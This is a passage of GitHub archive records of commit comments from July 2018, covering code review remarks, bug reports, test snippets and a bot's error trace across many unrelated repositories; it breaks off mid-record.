{"id":"7987693540","type":"CommitCommentEvent","actor":{"login":"nanqinlang"},"repo":{"name":"nanqinlang-mogic/BoringSSL"},"payload":{"comment":{"id":29760998,"position":null,"line":null,"path":null,"commit_id":"349e9d82052568c7f157cbef44d281763327bb89","created_at":"2018-07-19T08:39:50Z","updated_at":"2018-07-19T08:39:50Z","author_association":"NONE","body":"failed.\r\n\r\n`crypto/cipher_extra/e_chacha20poly1305.c` changed too much to point."}},"created_at":"2018-07-19T08:39:50Z"}
{"id":"7987697466","type":"CommitCommentEvent","actor":{"login":"ddeliastefania"},"repo":{"name":"turcumadalina/New_Omni_Notes2"},"payload":{"comment":{"id":29761005,"position":17,"line":17,"path":"omniNotes/src/androidTest/java/it/feio/android/omninotes/screens/Trash.java","commit_id":"dffd7017a34dbc3da1bc9a4023d501e9b3daea86","created_at":"2018-07-19T08:40:33Z","updated_at":"2018-07-19T08:40:33Z","author_association":"COLLABORATOR","body":"You don't need this if you use assertEquals."}},"created_at":"2018-07-19T08:40:33Z"}
{"id":"7987698137","type":"CommitCommentEvent","actor":{"login":"ppdmc"},"repo":{"name":"ppdmc/interface"},"payload":{"comment":{"id":29761009,"position":38,"line":379,"path":"Program.cs","commit_id":"ae115aace6e4edd7e4a560f082b5f711a101369f","created_at":"2018-07-19T08:40:40Z","updated_at":"2018-07-19T08:40:40Z","author_association":"OWNER","body":"378 IListable[]  매개변수에 대한 확장 메소드\r\n\r\n// 뭔 말인지 하나도 모르겠.....LinQ는 또뭐야.."}},"created_at":"2018-07-19T08:40:40Z"}
{"id":"7987699207","type":"CommitCommentEvent","actor":{"login":"dmdeklerk"},"repo":{"name":"Heat-Ledger-Ltd/heat-ui"},"payload":{"comment":{"id":29761013,"position":63,"line":208,"path":"app/src/services/SettingsService.ts","commit_id":"66446b551ec8cb4f49bc5970dd1d5029f6c1d111","created_at":"2018-07-19T08:40:53Z","updated_at":"2018-07-19T08:40:53Z","author_association":"MEMBER","body":"All we change between servers are ports and addresses, I've seen the certifieraccount is declared locally only but for the sake of safety its better we not update this here.\r\nSince the server config file will likely be moved into an externally hosted file it is at risk of being taken over and if in that way the certifier account can be changed some one/anyone could make their assets appear certified in the browser or desktop app"}},"created_at":"2018-07-19T08:40:53Z"}
{"id":"7987700680","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"PavelNet/Lessons"},"payload":{"comment":{"id":29761015,"position":32,"line":32,"path":"4.rb","commit_id":"6dc5ee357a58cb5ff8311473dd20f5ad30951cb9","created_at":"2018-07-19T08:41:10Z","updated_at":"2018-07-19T08:41:10Z","author_association":"NONE","body":"Тут нет смысла вычислять квадратный корень. Он будет 0. И если ты к б прибавишь 0 ничего не изменится."}},"created_at":"2018-07-19T08:41:10Z"}
{"id":"7987705754","type":"CommitCommentEvent","actor":{"login":"raidoz"},"repo":{"name":"thinnect/tos-platforms"},"payload":{"comment":{"id":29761023,"position":null,"line":null,"path":null,"commit_id":"8ed7e5f6c976c0ce5c742206374aa091a435d31a","created_at":"2018-07-19T08:42:08Z","updated_at":"2018-07-19T08:42:08Z","author_association":"MEMBER","body":"Seems the specific addition refers to the code in https://github.com/thinnect/tos-murp-powersupply . Actually, I think that repo should probably be merged with this one here, though the TINYOS_ROOT_DIR_ADDITIONAL logic works in this case as is also. Not much there though - mostly the rfr2 just inherits everything from rfa1 in the TinyOS main master."}},"created_at":"2018-07-19T08:42:08Z"}
{"id":"7987708062","type":"CommitCommentEvent","actor":{"login":"FunkyOz"},"repo":{"name":"FunkyOz/light-autocomplete"},"payload":{"comment":{"id":29761026,"position":null,"line":null,"path":null,"commit_id":"98373a62d15aa9f9f69e48bd42bdfdc1f3b36aab","created_at":"2018-07-19T08:42:33Z","updated_at":"2018-07-19T08:42:33Z","author_association":"OWNER","body":"Hi,\nSure, what kind of problem did you have?\n\n> Il giorno 19 lug 2018, alle ore 09:27, kannadhasank <notifications@github.com> ha scritto:\n> \n> can u help me to figure out that\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/FunkyOz/light-autocomplete/commit/98373a62d15aa9f9f69e48bd42bdfdc1f3b36aab#commitcomment-29760183>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AZalGDf9fOcfWmBWamvYbTIF_bU6IhATks5uIDTRgaJpZM4VV4kb>.\n> \n\n"}},"created_at":"2018-07-19T08:42:33Z"}
{"id":"7987709570","type":"CommitCommentEvent","actor":{"login":"pmli"},"repo":{"name":"pymor/pymor"},"payload":{"comment":{"id":29761030,"position":null,"line":null,"path":null,"commit_id":"55374b7e26d6b18cf79df0c279aa7c007b070e98","created_at":"2018-07-19T08:42:50Z","updated_at":"2018-07-19T08:42:50Z","author_association":"MEMBER","body":"Yes, I guess..."}},"created_at":"2018-07-19T08:42:50Z"}
{"id":"7987711932","type":"CommitCommentEvent","actor":{"login":"cquest"},"repo":{"name":"Zigazou/miedit"},"payload":{"comment":{"id":29761035,"position":70,"line":495,"path":"app/minitel-decoder.js","commit_id":"007f4c2982798f8664412d2347bd51ecb248098b","created_at":"2018-07-19T08:43:20Z","updated_at":"2018-07-19T08:43:20Z","author_association":"CONTRIBUTOR","body":"Les attributs (couleurs, clignotement, etc) peuvent être changés en ligne 0... confirmé sur Minitel 1B TEIC"}},"created_at":"2018-07-19T08:43:20Z"}
{"id":"7987715777","type":"CommitCommentEvent","actor":{"login":"cquest"},"repo":{"name":"Zigazou/miedit"},"payload":{"comment":{"id":29761039,"position":79,"line":506,"path":"app/minitel-decoder.js","commit_id":"007f4c2982798f8664412d2347bd51ecb248098b","created_at":"2018-07-19T08:44:01Z","updated_at":"2018-07-19T08:44:01Z","author_association":"CONTRIBUTOR","body":"Les attributs (couleurs, clignotement, etc) peuvent être changés en ligne 0... confirmé sur Minitel 1B TELIC"}},"created_at":"2018-07-19T08:44:01Z"}
{"id":"7987727312","type":"CommitCommentEvent","actor":{"login":"editfmah"},"repo":{"name":"giantroboticcat/sharkorm"},"payload":{"comment":{"id":29761070,"position":null,"line":null,"path":null,"commit_id":"f35a81c651e0f267bf7b89ed2ff7842d9b8b71c4","created_at":"2018-07-19T08:46:02Z","updated_at":"2018-07-19T08:46:02Z","author_association":"NONE","body":"Thanks, we are going to go through the whole project trying to fix it so there are no points anywhere (query manager) where a keyword will break the ORM.\r\n\r\nSo it was more acknowledgement of the fix made by you, but actually that whole module has been completely re-written anyway."}},"created_at":"2018-07-19T08:46:02Z"}
{"id":"7987727443","type":"CommitCommentEvent","actor":{"login":"tmdoit"},"repo":{"name":"tmdoit/node-red-nodes"},"payload":{"comment":{"id":29761073,"position":null,"line":null,"path":null,"commit_id":"fcb5126c500cd960d136436b2256655d44e2c137","created_at":"2018-07-19T08:46:03Z","updated_at":"2018-07-19T08:46:03Z","author_association":"OWNER","body":"You can test above change with the follo[{\"id\":\"b105cd3e.5f79e\",\"type\":\"inject\",\"z\":\"8dfa453c.668ce8\",\"name\":\"SELECT * FROM City\",\"topic\":\"SELECT * FROM City\",\"payload\":\"\",\"payloadType\":\"date\",\"repeat\":\"\",\"crontab\":\"\",\"once\":false,\"onceDelay\":0.1,\"x\":220,\"y\":200,\"wires\":[[\"13d083e5.5a00fc\"]]},{\"id\":\"bafb47cc.da6e68\",\"type\":\"debug\",\"z\":\"8dfa453c.668ce8\",\"name\":\"\",\"active\":true,\"tosidebar\":true,\"console\":false,\"tostatus\":false,\"complete\":\"true\",\"x\":550,\"y\":200,\"wires\":[]},{\"id\":\"a42881d5.6351f\",\"type\":\"inject\",\"z\":\"8dfa453c.668ce8\",\"name\":\"CREATE TABLE CITY AND FILL WITH DATA\",\"topic\":\"BEGIN TRANSACTION; CREATE TABLE IF NOT EXISTS City ( Id INTEGER PRIMARY KEY, Name STRING UNIQUE); INSERT OR IGNORE INTO City VALUES(null, 'Warsaw'); INSERT OR IGNORE INTO City VALUES(null, 'Poznan'); COMMIT;\",\"payload\":\"\",\"payloadType\":\"date\",\"repeat\":\"\",\"crontab\":\"\",\"once\":false,\"onceDelay\":0.1,\"x\":290,\"y\":160,\"wires\":[[\"5ea27fb8.31a3e\"]]},{\"id\":\"98534300.962ea\",\"type\":\"debug\",\"z\":\"8dfa453c.668ce8\",\"name\":\"\",\"active\":true,\"tosidebar\":true,\"console\":false,\"tostatus\":false,\"complete\":\"true\",\"x\":690,\"y\":160,\"wires\":[]},{\"id\":\"13d083e5.5a00fc\",\"type\":\"sqlite\",\"z\":\"8dfa453c.668ce8\",\"mydb\":\"76d038c0.f585a8\",\"sqlquery\":\"msg.topic\",\"sql\":\"\",\"name\":\"\",\"x\":410,\"y\":200,\"wires\":[[\"bafb47cc.da6e68\"]]},{\"id\":\"5ea27fb8.31a3e\",\"type\":\"sqlite\",\"z\":\"8dfa453c.668ce8\",\"mydb\":\"76d038c0.f585a8\",\"sqlquery\":\"batch\",\"sql\":\"\",\"name\":\"\",\"x\":550,\"y\":160,\"wires\":[[\"98534300.962ea\"]]},{\"id\":\"dea38663.a9cbb8\",\"type\":\"inject\",\"z\":\"8dfa453c.668ce8\",\"name\":\"DROP TABLE City\",\"topic\":\"DROP TABLE City\",\"payload\":\"\",\"payloadType\":\"date\",\"repeat\":\"\",\"crontab\":\"\",\"once\":false,\"onceDelay\":0.1,\"x\":210,\"y\":240,\"wires\":[[\"db822cc.9e3b2d\"]]},{\"id\":\"db822cc.9e3b2d\",\"type\":\"sqlite\",\"z\":\"8dfa453c.668ce8\",\"mydb\":\"76d038c0.f585a8\",\"sqlquery\":\"msg.topic\",\"sql\":\"\",\"name\":\"\",\"x\":390,\"y\":240,\"wires\":[[\"1e32e434.9afa4c\"]]},{\"id\":\"1e32e434.9afa4c\",\"type\":\"debug\",\"z\":\"8dfa453c.668ce8\",\"name\":\"\",\"active\":true,\"tosidebar\":true,\"console\":false,\"tostatus\":false,\"complete\":\"true\",\"x\":530,\"y\":240,\"wires\":[]},{\"id\":\"76d038c0.f585a8\",\"type\":\"sqlitedb\",\"z\":\"\",\"db\":\"test\"}]wing code:\r\n"}},"created_at":"2018-07-19T08:46:03Z"}
{"id":"7987731733","type":"CommitCommentEvent","actor":{"login":"fadani"},"repo":{"name":"languagedrops/react-native-svg-animations"},"payload":{"comment":{"id":29761081,"position":9,"line":17,"path":"components/AnimatedSVGPath/index.js","commit_id":"1021ac362ef5faa74bcb74d0df6a0c31cc9528f0","created_at":"2018-07-19T08:46:48Z","updated_at":"2018-07-19T08:46:48Z","author_association":"NONE","body":"@AppPear You also need to check if it's Android. I'm not sure how this would work on a random iOS device. "}},"created_at":"2018-07-19T08:46:48Z"}
{"id":"7987732684","type":"CommitCommentEvent","actor":{"login":"ishanthap"},"repo":{"name":"slashmax/AAMirror"},"payload":{"comment":{"id":29761083,"position":null,"line":null,"path":null,"commit_id":"d76f6d97fcb41ddff4197dc5744d4a9b3e5622f3","created_at":"2018-07-19T08:46:59Z","updated_at":"2018-07-19T08:46:59Z","author_association":"NONE","body":"works well.."}},"created_at":"2018-07-19T08:46:59Z"}
{"id":"7987732932","type":"CommitCommentEvent","actor":{"login":"garbagemule"},"repo":{"name":"garbagemule/MobArena"},"payload":{"comment":{"id":29761086,"position":null,"line":null,"path":null,"commit_id":"e484583b7e0456da3c0287a1db26f473fde3d0f5","created_at":"2018-07-19T08:47:02Z","updated_at":"2018-07-19T08:47:02Z","author_association":"OWNER","body":"I suppose that we could just always deny the use of the held item. I can't think of a situation where you would want to actually use a held item in the lobby. #431 specifically mentions command blocks and levers. Gulping potions, eating food, placing blocks, setting fire to things - none of these _seems_ useful in the lobby at least.\r\n\r\nAre there any held items that are activated by left-clicking? Could we just check if the event has an item, and in that case, deny usage of the item held?\r\n\r\nThoughts?"}},"created_at":"2018-07-19T08:47:02Z"}
{"id":"7987733284","type":"CommitCommentEvent","actor":{"login":"bchareyre"},"repo":{"name":"yade/trunk"},"payload":{"comment":{"id":29761087,"position":null,"line":null,"path":null,"commit_id":"d8d789fd9b9e7e10c0a8880f770ecc5a52976718","created_at":"2018-07-19T08:47:06Z","updated_at":"2018-07-19T08:47:06Z","author_association":"MEMBER","body":"Hi Jérôme, I agree but please ask such things on the mailing list so we\nhave centralized archives. I don't even know where this mail comes from and\nwhere my anwer will go, nor how long it will remain online.\nBruno\n\nLe jeu. 19 juil. 2018 10:17, Jerome Duriez <notifications@github.com> a\nécrit :\n\n> Hi Bruno,\n>\n> I was about to remove for good every code regarding these functions.\n> What do you think ?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/yade/trunk/commit/d8d789fd9b9e7e10c0a8880f770ecc5a52976718#commitcomment-29760717>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABaqBuyJlK-Cu0SKHpMHBnUuqOGb-8MCks5uIEB-gaJpZM4VV81I>\n> .\n>\n"}},"created_at":"2018-07-19T08:47:06Z"}
{"id":"7987734671","type":"CommitCommentEvent","actor":{"login":"mywtfmp3"},"repo":{"name":"mywtfmp3/boost_graph_cookbook_2"},"payload":{"comment":{"id":29761088,"position":null,"line":null,"path":null,"commit_id":"f003aa9368ea559d4f67a5d4785533754fb4cb8c","created_at":"2018-07-19T08:47:20Z","updated_at":"2018-07-19T08:47:20Z","author_association":"OWNER","body":"Finally, I have an example I am happy with. This create a gif file illustrating how depth first search traverse through a graph.\r\n\r\n![movie](https://user-images.githubusercontent.com/3619244/42931694-f0e03c78-8b72-11e8-9031-28fd9d26b045.gif)\r\n\r\nTo generate this gif file, you need to copy python script `create_gif.py` from `scripts` directory to `dfs` directory and run it. The gif file is generated through `imageio` module. You need to install the module first by `pip install --user imageio` before running the python script."}},"created_at":"2018-07-19T08:47:20Z"}
{"id":"7987734857","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29761089,"position":null,"line":null,"path":null,"commit_id":"0061729f65c7fec2fb3208b29a34c39bf0be36e4","created_at":"2018-07-19T08:47:22Z","updated_at":"2018-07-19T08:47:22Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-search](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-search).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-search-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-19T08:47:22Z"}
{"id":"7987741090","type":"CommitCommentEvent","actor":{"login":"joshmh"},"repo":{"name":"ACINQ/eclair-wallet"},"payload":{"comment":{"id":29761100,"position":null,"line":null,"path":null,"commit_id":"56dd9c5f81fd70b0fb0cb0f7dea25c523205f2bd","created_at":"2018-07-19T08:48:26Z","updated_at":"2018-07-19T08:48:26Z","author_association":"NONE","body":"Yay!"}},"created_at":"2018-07-19T08:48:26Z"}
{"id":"7987749567","type":"CommitCommentEvent","actor":{"login":"markyz89"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29761117,"position":null,"line":null,"path":null,"commit_id":"f794f553e4937f6b2afaab2acdb14c623d8eb8c1","created_at":"2018-07-19T08:49:57Z","updated_at":"2018-07-19T08:49:57Z","author_association":"NONE","body":"@OzkanAbdullahoglu \r\n\r\nThanks, that works. Much appreciated."}},"created_at":"2018-07-19T08:49:57Z"}
{"id":"7987750921","type":"CommitCommentEvent","actor":{"login":"Suil3File"},"repo":{"name":"eni9889/ppsideloader"},"payload":{"comment":{"id":29761121,"position":null,"line":null,"path":null,"commit_id":"492855eed30fc49aceaeb4104d1e16762ca1d46c","created_at":"2018-07-19T08:50:12Z","updated_at":"2018-07-19T08:50:12Z","author_association":"NONE","body":"492855e"}},"created_at":"2018-07-19T08:50:12Z"}
{"id":"7987753701","type":"CommitCommentEvent","actor":{"login":"froide-ninomiya"},"repo":{"name":"froide-ninomiya/github-trello-mizunumatest"},"payload":{"comment":{"id":29761122,"position":null,"line":null,"path":null,"commit_id":"b71e6cb5253cc0906570390dcc320ad01fc8aa54","created_at":"2018-07-19T08:50:41Z","updated_at":"2018-07-19T08:50:41Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [テスト](https://trello.com/c/SRbKhfLB/319-%E3%83%86%E3%82%B9%E3%83%88)"}},"created_at":"2018-07-19T08:50:41Z"}
{"id":"7987763126","type":"CommitCommentEvent","actor":{"login":"tomasherceg"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29761145,"position":54,"line":1075,"path":"src/DotVVM.Framework/Resources/Scripts/DotVVM.ts","commit_id":"3f4fb5acbe8b943317bedf9bf105664cdd2b026a","created_at":"2018-07-19T08:52:24Z","updated_at":"2018-07-19T08:52:24Z","author_association":"CONTRIBUTOR","body":"Originally, we added this functionality because of `Enabled` property on `LinkButton`. The `disabled` attribute shouldn't be on hyperlinks, but it worked in IE and also in Chrome if I remember correctly. For other browsers, we added this check.\r\nI agree that we should get rid of the `disabled` attribute and find another way of doing this. I think that this only concerns `LinkButton` - other controls shouldn't use this feature."}},"created_at":"2018-07-19T08:52:24Z"}
{"id":"7987764070","type":"CommitCommentEvent","actor":{"login":"nickyzzzz"},"repo":{"name":"logpai/loghub"},"payload":{"comment":{"id":29761146,"position":5,"line":53,"path":".gitignore","commit_id":"bc5be362f34b89cbc32aad2aec92a4879cdb67fc","created_at":"2018-07-19T08:52:36Z","updated_at":"2018-07-19T08:52:36Z","author_association":"NONE","body":"add some user name"}},"created_at":"2018-07-19T08:52:36Z"}
{"id":"7987767598","type":"CommitCommentEvent","actor":{"login":"mywtfmp3"},"repo":{"name":"mywtfmp3/boost_graph_cookbook_2"},"payload":{"comment":{"id":29761155,"position":null,"line":null,"path":null,"commit_id":"f003aa9368ea559d4f67a5d4785533754fb4cb8c","created_at":"2018-07-19T08:53:17Z","updated_at":"2018-07-19T08:53:17Z","author_association":"OWNER","body":"Please ignore my variable naming conventions at the moment."}},"created_at":"2018-07-19T08:53:17Z"}
{"id":"7987778596","type":"CommitCommentEvent","actor":{"login":"mgvel"},"repo":{"name":"sarathikathirvel/code_exercise"},"payload":{"comment":{"id":29761178,"position":null,"line":null,"path":null,"commit_id":"12e800ba30a77a7d90f28d45b6a5059245accf96","created_at":"2018-07-19T08:55:21Z","updated_at":"2018-07-19T08:55:21Z","author_association":"NONE","body":"Good work sarathi. You can also display the python codes in README.md using code blocks like below\r\n\r\n```py\r\n\r\ndef test():\r\n      pass\r\n```"}},"created_at":"2018-07-19T08:55:21Z"}
{"id":"7987781421","type":"CommitCommentEvent","actor":{"login":"GunsFireRose911"},"repo":{"name":"GunsFireRose911/test"},"payload":{"comment":{"id":29761182,"position":2,"line":2,"path":"HelloWorld.java","commit_id":"70edc2757deed8688e2009452e2a558ef32ca990","created_at":"2018-07-19T08:55:53Z","updated_at":"2018-07-19T08:55:53Z","author_association":"OWNER","body":"_**忘了你我真做不到**_"}},"created_at":"2018-07-19T08:55:53Z"}
{"id":"7987781520","type":"CommitCommentEvent","actor":{"login":"alfonsogarciacaro"},"repo":{"name":"fable-compiler/Fable"},"payload":{"comment":{"id":29761184,"position":null,"line":null,"path":null,"commit_id":"15aa796f7299c51e9271715ae2f34843c3777ba7","created_at":"2018-07-19T08:55:54Z","updated_at":"2018-07-19T08:55:54Z","author_association":"MEMBER","body":"Apparently Webpack created a corrupted bundle in production mode (uglify-js is not compatible with ES2015) and when trying Webpack with babel-loader I got out of memory exception. So I gave it a go to a two-step bundle with Rollup + UglifyJS (same as for Fable 1 REPL but with full minification) and it worked :) Maybe we can stick with this for now, Fable 2 actually doesn't use many ES2015 features. I think the only problem was the remaining `class`es in fable-core TypeScript files."}},"created_at":"2018-07-19T08:55:54Z"}
{"id":"7987782503","type":"CommitCommentEvent","actor":{"login":"GunsFireRose911"},"repo":{"name":"GunsFireRose911/test"},"payload":{"comment":{"id":29761186,"position":null,"line":null,"path":null,"commit_id":"70edc2757deed8688e2009452e2a558ef32ca990","created_at":"2018-07-19T08:56:06Z","updated_at":"2018-07-19T08:56:06Z","author_association":"OWNER","body":"### "}},"created_at":"2018-07-19T08:56:06Z"}
{"id":"7987783396","type":"CommitCommentEvent","actor":{"login":"mgvel"},"repo":{"name":"sarathikathirvel/code_exercise"},"payload":{"comment":{"id":29761197,"position":null,"line":null,"path":null,"commit_id":"12e800ba30a77a7d90f28d45b6a5059245accf96","created_at":"2018-07-19T08:56:16Z","updated_at":"2018-07-19T08:56:16Z","author_association":"NONE","body":"Also remove the function program from here, since that's our propitiatory source code we should not disclose to the public. "}},"created_at":"2018-07-19T08:56:16Z"}
{"id":"7987794384","type":"CommitCommentEvent","actor":{"login":"15crmor"},"repo":{"name":"15crmor/notes_share"},"payload":{"comment":{"id":29761228,"position":null,"line":null,"path":null,"commit_id":"9a5fb8b5b6ff81cbeadb85b44d3cedf21819edc2","created_at":"2018-07-19T08:58:20Z","updated_at":"2018-07-19T08:58:20Z","author_association":"OWNER","body":"sdf"}},"created_at":"2018-07-19T08:58:20Z"}
{"id":"7987797315","type":"CommitCommentEvent","actor":{"login":"Ahmed-Elbasha"},"repo":{"name":"Ahmed-Elbasha/Customer-List-"},"payload":{"comment":{"id":29761233,"position":null,"line":null,"path":null,"commit_id":"4d86dd850630fd28e2f85805c3549152096c798a","created_at":"2018-07-19T08:58:53Z","updated_at":"2018-07-19T08:58:53Z","author_association":"OWNER","body":"Fixed Minor Bugs*"}},"created_at":"2018-07-19T08:58:53Z"}
{"id":"7987809370","type":"CommitCommentEvent","actor":{"login":"Thridev"},"repo":{"name":"Thridev/todo1"},"payload":{"comment":{"id":29761262,"position":null,"line":null,"path":null,"commit_id":"de1ccaeb849f2e6b13f2591d9442e2d714299571","created_at":"2018-07-19T09:00:58Z","updated_at":"2018-07-19T09:00:58Z","author_association":"OWNER","body":"adddd"}},"created_at":"2018-07-19T09:00:58Z"}
{"id":"7987812104","type":"CommitCommentEvent","actor":{"login":"artem-dudarev"},"repo":{"name":"VirtoCommerce/vc-module-marketing"},"payload":{"comment":{"id":29761269,"position":6,"line":83,"path":"VirtoCommerce.MarketingModule.Web/Controllers/Api/MarketingModulePromotionController.cs","commit_id":"cf74322fe8b73239b1bf11efe60d8fc68936f761","created_at":"2018-07-19T09:01:27Z","updated_at":"2018-07-19T09:01:27Z","author_association":"COLLABORATOR","body":"Split into 3 different assignments;"}},"created_at":"2018-07-19T09:01:27Z"}
{"id":"7987812348","type":"CommitCommentEvent","actor":{"login":"woshizhangyiran"},"repo":{"name":"woshizhangyiran/trouble"},"payload":{"comment":{"id":29761270,"position":null,"line":null,"path":null,"commit_id":"f9a8469257b497b6c6f08944521fed3cd37a24dd","created_at":"2018-07-19T09:01:29Z","updated_at":"2018-07-19T09:01:29Z","author_association":"OWNER","body":"简单的几个主流程自动化的case"}},"created_at":"2018-07-19T09:01:29Z"}
{"id":"7987813030","type":"CommitCommentEvent","actor":{"login":"MrJackC"},"repo":{"name":"MrJackC/Algorithms"},"payload":{"comment":{"id":29761271,"position":null,"line":null,"path":null,"commit_id":"8080b44a0aad8df3c7fa3aa9ddf90e6bcdb76cff","created_at":"2018-07-19T09:01:37Z","updated_at":"2018-07-19T09:01:37Z","author_association":"OWNER","body":"收到提交"}},"created_at":"2018-07-19T09:01:37Z"}
{"id":"7987815852","type":"CommitCommentEvent","actor":{"login":"waielal"},"repo":{"name":"waielal/SPICA"},"payload":{"comment":{"id":29761274,"position":17,"line":17,"path":"SPICA/Formats/Generic/UnityAnim/ANIM.cs","commit_id":"fb64ce2bb5210dd442ffad61bb97dff9ca6d1af3","created_at":"2018-07-19T09:02:08Z","updated_at":"2018-07-19T09:02:08Z","author_association":"OWNER","body":"This works but you still have to manually select every animation to export it because I just added it as an other option to the save dialog. But you can manually trigger the save event by using\r\n`new ANIM(Scene, MdlIndex, AnimIndex).Save(FileName);`\r\nThere are still some issues. Sometime the rotation values get bigger than 180° it wraps down to -180° creating a break in the animation. And there was something else but I can't remember it what it was.\r\n"}},"created_at":"2018-07-19T09:02:08Z"}
{"id":"7987822951","type":"CommitCommentEvent","actor":{"login":"Haseo97"},"repo":{"name":"Haseo97/kernel_rebirth_xiaomi_sdm660"},"payload":{"comment":{"id":29761281,"position":null,"line":null,"path":null,"commit_id":"61cf6f5e7ea3074142452da4f8440fd659770222","created_at":"2018-07-19T09:03:24Z","updated_at":"2018-07-19T09:03:24Z","author_association":"OWNER","body":"No, but afaik, ours doesn't need this"}},"created_at":"2018-07-19T09:03:24Z"}
{"id":"7987823462","type":"CommitCommentEvent","actor":{"login":"pmli"},"repo":{"name":"pymor/pymor"},"payload":{"comment":{"id":29761284,"position":null,"line":null,"path":null,"commit_id":"dae4355dc1121a9d5755c5538a3e6118078ef2f8","created_at":"2018-07-19T09:03:29Z","updated_at":"2018-07-19T09:03:29Z","author_association":"MEMBER","body":"@renemilk This ok?"}},"created_at":"2018-07-19T09:03:29Z"}
{"id":"7987824485","type":"CommitCommentEvent","actor":{"login":"nkarre"},"repo":{"name":"billybichon/liveGQL"},"payload":{"comment":{"id":29761288,"position":null,"line":null,"path":null,"commit_id":"42154b200727e70a7556e3ca89b217407d9b1a70","created_at":"2018-07-19T09:03:41Z","updated_at":"2018-07-19T09:03:41Z","author_association":"NONE","body":"Help to resolve the issue subscription issues, we tried with subscription it does not  get response with java but works fine with JS.\r\n\r\nBelow is the schema and the way we are calling subscription.\r\nThanks for your help in advance .\r\n\r\n\r\n\r\nServer schema:\r\n# The subscription root type, specifying what we can subscribe to\r\ntype Subscription {\r\n  messageAdded(channelId: ID!): Message\r\n}\r\n\r\n\r\nJS CLient: (working )\r\nconst messagesSubscription = gql`\r\n  subscription messageAdded($channelId: ID!) {\r\n    messageAdded(channelId: $channelId) {\r\n      id\r\n      text\r\n    }\r\n  }\r\n`;\r\nconst subscriptionOperation = {\r\n    query: messagesSubscription,\r\n    variables: { channelId: 1 }\r\n};\r\n\r\nJAVA Client: (not receiving data when changed)\r\nString query = \"subscription messageAdded($channelId: ID!) {\\n\" + \r\n        \"    messageAdded(channelId: $channelId) {\\n\" + \r\n        \"      id\\n\" + \r\n        \"      text\\n\" + \r\n        \"    }\\n\" + \r\n        \"  }\";\r\n    HashMap<String, Object> variablesMap= new HashMap<>();\r\n    variablesMap.put(\"channelId\", 7);\r\n    \r\n    JSONObject graphqlMsg = new JSONObject();\r\n    graphqlMsg.put(\"variables\", variablesMap);\r\n    graphqlMsg.put(\"query\", query);\r\n\r\nActual Query = {\"variables\":{\"channelId\":7},\"query\":\"subscription messageAdded($channelId: ID!) {\\n    messageAdded(channelId: $channelId) {\\n      id\\n      text\\n    }\\n  }\"}\r\n"}},"created_at":"2018-07-19T09:03:41Z"}
{"id":"7987836306","type":"CommitCommentEvent","actor":{"login":"cthoyt"},"repo":{"name":"ozlemmuslu/GAT2VEC"},"payload":{"comment":{"id":29761300,"position":116,"line":147,"path":"src/gat2vec.py","commit_id":"97f1cf6ee7be1e878225de41ba7ab86a4801fb35","created_at":"2018-07-19T09:05:55Z","updated_at":"2018-07-19T09:05:55Z","author_association":"NONE","body":"this is terrifying, and also super unsafe. Should be using the `os.path` to build this"}},"created_at":"2018-07-19T09:05:55Z"}
{"id":"7987836807","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/refarm-site"},"payload":{"comment":{"id":29761301,"position":null,"line":null,"path":null,"commit_id":"028b1b16c14079efa2da3092952041604437ba67","created_at":"2018-07-19T09:06:01Z","updated_at":"2018-07-19T09:06:01Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> set -x && set -e && set -o pipefail && cd /tmp/0pdd20180719-4-7szbpf/fidals/refarm-site && pdd -v -f /tmp/20180719-2371-1pvjgre [1]: bash: warning: setlocale: LC_ALL: cannot change locale (UTF-8) + set -e + set -o pipefail + cd /tmp/0pdd20180719-4-7szbpf/fidals/refarm-site + pdd -v -f...\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nUserError\nset -x && set -e && set -o pipefail && cd /tmp/0pdd20180719-4-7szbpf/fidals/refarm-site && pdd -v -f /tmp/20180719-2371-1pvjgre [1]:\nbash: warning: setlocale: LC_ALL: cannot change locale (UTF-8)\n+ set -e\n+ set -o pipefail\n+ cd /tmp/0pdd20180719-4-7szbpf/fidals/refarm-site\n+ pdd -v -f /tmp/20180719-2371-1pvjgre\n\nMy version is 0.20.3\nRuby version is 2.3.3 at x86_64-linux\nReading /tmp/0pdd20180719-4-7szbpf/fidals/refarm-site\n212 file(s) found, 56 excluded\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/images/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/images/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/pages/management/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/pages/management/commands/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/pages/templatetags/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/pages/migrations/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/ecommerce/__init__.py is a binary file (1 bytes)\n/tmp/0pdd20180719-4-7szbpf/fidals/refarm-site/ecommerce/img/02.png is a binary file (32719 